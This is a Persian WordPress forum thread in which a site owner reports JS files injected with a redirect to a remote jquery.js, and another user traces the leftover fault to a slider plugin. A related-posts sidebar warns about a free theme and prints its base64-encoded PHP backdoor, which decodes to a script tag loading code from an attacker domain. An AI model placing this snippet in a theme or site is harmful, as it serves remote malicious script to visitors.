admintory

هک شدن سایت وردپرس

5 پست در این موضوع قرار دارد

سلام

صورت مسئله:

روی یک هاست چندین سایت دارم. امروز برای یکیشون متوجه اعمال خرابکاری شدم.

آدرس سایت مورد نظر: http://golbahardaneh.com

این سایت بعد لود فایل های js ریدایرکت میشه روی یک آی پی نامربوط. آدرس هدف: http://134.249.116.78/jquery.js

هیچ بک آپی از قبل ندارم.

کاری که من کردم:

1- از فایل ها و دیتابیس فعلی بک آپ گرفتم.

2- افزونه امنیتی WordFence رو نصب کردم و سایت رو اسکن کردم. نتیجه اسکن تایید آلوده بودن حدود 400 فایل js به کد مخرب بود.

3- از طریق این لینک   https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection  کد مخرب رو پیدا کردم و جاش یه کد جایگزین رو در همه فایلها گذاشتم.

4- توی htaccess آدرس هدف رو بن کردم.

5- توی یه سایت اسکنر امنیتی معروف سایت رو اسکن کردم (SUCURI SITE) که چند تا هشدار Maleware به من داد. ولی چیزی نفهمیدم ازش

6- وردپرس و پلاگین ها رو آپدیت کردم.

 

ولی هنوز مشکل حل نشده. لطفا کمک کنید.

نکته: ریدایرکت فقط برای صفحه اصلی سایته و صفحات داخلی با وارد کردن مستقیم آدرس صفحه لود میشن. مثل http://golbahardaneh.com/business-model

به اشتراک گذاری این پست


لینک به پست
در 13 دقیقه قبل، admintory گفته است :

سلام

صورت مسئله:

روی یک هاست چندین سایت دارم. امروز برای یکیشون متوجه اعمال خرابکاری شدم.

آدرس سایت مورد نظر: http://golbahardaneh.com

این سایت بعد لود فایل های js ریدایرکت میشه روی یک آی پی نامربوط. آدرس هدف: http://134.249.116.78/jquery.js

هیچ بک آپی از قبل ندارم.

کاری که من کردم:

1- از فایل ها و دیتابیس فعلی بک آپ گرفتم.

2- افزونه امنیتی WordFence رو نصب کردم و سایت رو اسکن کردم. نتیجه اسکن تایید آلوده بودن حدود 400 فایل js به کد مخرب بود.

3- از طریق این لینک   https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection  کد مخرب رو پیدا کردم و جاش یه کد جایگزین رو در همه فایلها گذاشتم.

4- توی htaccess آدرس هدف رو بن کردم.

5- توی یه سایت اسکنر امنیتی معروف سایت رو اسکن کردم (SUCURI SITE) که چند تا هشدار Maleware به من داد. ولی چیزی نفهمیدم ازش

6- وردپرس و پلاگین ها رو آپدیت کردم.

 

ولی هنوز مشکل حل نشده. لطفا کمک کنید.

نکته: ریدایرکت فقط برای صفحه اصلی سایته و صفحات داخلی با وارد کردن مستقیم آدرس صفحه لود میشن. مثل http://golbahardaneh.com/business-model

Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include.
This includes make eliminates the revolution slider libraries, and make it not work.

To fix it you can:
    1. In the Slider Settings -> Troubleshooting set option: Put JS Includes To Body option to true.
    2. Find the double jquery.js include and remove it.

افزونه اسلاید رو موقتا غیر فعال کنید

به اشتراک گذاری این پست


لینک به پست
در 28 دقیقه قبل، 4M!R گفته است :

Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include.
This includes make eliminates the revolution slider libraries, and make it not work.

To fix it you can:
    1. In the Slider Settings -> Troubleshooting set option: Put JS Includes To Body option to true.
    2. Find the double jquery.js include and remove it.

افزونه اسلاید رو موقتا غیر فعال کنید

بله غیر فعالش کردم و درست شد.

این آنالیز رو از کجا گرفتین؟

به اشتراک گذاری این پست


لینک به پست
در 1 ساعت قبل، admintory گفته است :

بله غیر فعالش کردم و درست شد.

این آنالیز رو از کجا گرفتین؟

وقتی سایتتونو باز کردم اورد

شما  مثل اینکه فایل های جاوا اسکریپت این پلاگین رو هم حذف کردین یا جی کوئری دوبار  فراخوانی شده بود  و ....

موفق باشی هم وطنم

به اشتراک گذاری این پست


لینک به پست
در در 4/27/2017 at 01:24، 4M!R گفته است :

وقتی سایتتونو باز کردم اورد

شما  مثل اینکه فایل های جاوا اسکریپت این پلاگین رو هم حذف کردین یا جی کوئری دوبار  فراخوانی شده بود  و ....

موفق باشی هم وطنم

سلام

ببخشید این موضوع را دیدم  , دیدم مشکل خود منم همینه

یعنی http://134.249.116.78/jquery.js         

ببخشید راه حل این مشکل چیه؟

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط محمدرضا فتحی
      چند روزی هست که وقتی گزارش گوگل آنالیتیک رو نگاه میکنم و میخوام چک کنم ببینم کدوم یکی از پیج های وبسایتم بیشتر بازدید شده با یک url مربوط به وبسایت reddit.com مواجه میشم. امکانش هست این وبسایت، سایت من رو هک کرده باشه و وقتی کاربرای اینترنت توی سایت من هستن ریدایرکتشون کنه توی سایت خودش؟
      اگر حدسم درسته لطفا راهنمایی کنید چطور باید جلوش رو بگیرم و اگر اشتباهه پس چرا گوگل آنالیتیک این url رو جزء پیج های نمایش داده شده وبسایت من بهم نشون میده؟
      این آدرس کاملی هست که گوگل آنالیتیک بهم نشون میده:
      www.reddit.com/r/technology/comments/5foynf/lifehac%C4%B8ercom_original_idn_fake_safe_best_on_ff/
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط m2ostafa
      سلام من  سایتم ۲ بار  هک شده بود بخاطر همین یسری فایل های مخرب توش دیده بودم و سعی کردم پاک کنم.یبار کامل سایت رفت پایین و مجبور به ریکاوری شدیم.الان سایت بالاست اما خیلی هنوز فایل های مخرب توش تکثیر میشه اونقدر که دیگه الان هاست ۱ گیگم پر شده در صورتی که ۳۰۰ مگ دیتا بیشتر ندارم.کسی می تونه کمکم کنه بگه چجوری فایل هارو پیدا کنم؟
    • توسط loveali
      با سلام
      یه چند وقتیه که وقتی کسی برای اولین بار (از طریق موتور جست و جو -گوگل) سایت رو باز می کنه پیغام زیر رو که براتون اتچ کردم نمایش می ده
      dr-narmaki.com
      یه چند تا کد مشکوک هم دیدم تو فایل header که پاک کردم
      اول فک می کردم سرویس cloudflade که دیدم تو فروم های خارجی این کار رو می کنن که ادمین سایت رو گول بزنن و می گفتن سایتشون hijacking مرورگر شده
      به نظرتون چیکار می تونم بکنم؟
      باتشکر

    • توسط m2ostafa
      سلام دوستان از دیروز سایتم بالا نمیاد بدون اینکه به چیزی دست بزنم و تغییراتی بدم
      http://axaco.ir
      گوگل وبمستر تولز از چند روز  پیش بم پیام داده بود که فردی تغییراتی داده در هاست شما و بازدید شما غیر واقعی شده
      و
      امروزم متوجه فایل هایی شدم کاملا جدیده و بی ربط شبیه سایت های پ ورن ممنون میشم راهنماییم کنید باید چیکار کنم چون کلا سایتم بالا نمیاد و رتبه گوگلم هم دارم از دست می دم
      اینم ایمیل گوگل
      To: Webmaster of http://axaco.ir/,
      Google has detected that your site has been hacked by a third party who created malicious content on some of your pages. This critical issue utilizes your site’s reputation to show potential visitors unexpected or harmful content on your site or in search results. It also lowers the quality of results for Google Search users. Therefore, we have applied a manual action to your site that will warn users of hacked content when your site appears in search results. To remove this warning, clean up the hacked content, and file a reconsideration request. After we determine that your site no longer has hacked content, we will remove this manual action.
      Following are one or more example URLs where we found pages that have been compromised. Review them to gain a better sense of where this hacked content appears. The list is not exhaustive.
      http://axaco.ir/wp-content/plugins/wp-db-backup-made/eibl4p/-hello-pai.html
      http://axaco.ir/wp-content/plugins/wp-db-backup-made/eibl4p/fix-Kalyan-ma.html
      http://axaco.ir/wp-content/plugins/wp-db-backup-made/eibl4p/jam-buka-prsu.html